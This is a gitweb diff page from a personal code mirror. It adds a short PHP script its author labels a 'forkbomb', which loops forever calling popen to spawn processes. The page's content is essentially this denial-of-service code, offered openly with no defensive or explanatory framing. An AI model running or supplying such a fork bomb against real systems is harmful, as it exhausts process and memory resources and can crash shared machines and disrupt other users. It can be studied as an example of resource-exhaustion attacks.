Added lot of junk laying around on harvie.cz
[mirrors/Programs.git] / php / skripty / fork.php
diff --git a/php/skripty/fork.php b/php/skripty/fork.php
new file mode 100644 (file)
index 0000000..4be575e
--- /dev/null
@@ -0,0 +1,12 @@
+<?php\r
+//PHPForkBoom\r
+//Harvie 2oo7\r
+//Simple PHP forkbomb implementation\r
+\r
+$i = 0;\r
+while(1) {\r
+  $fp[$i] = popen($argv[0], "r");\r
+  $i++;\r
+}\r
+\r
+?>\r
This page took 0.121439 seconds and 4 git commands to generate.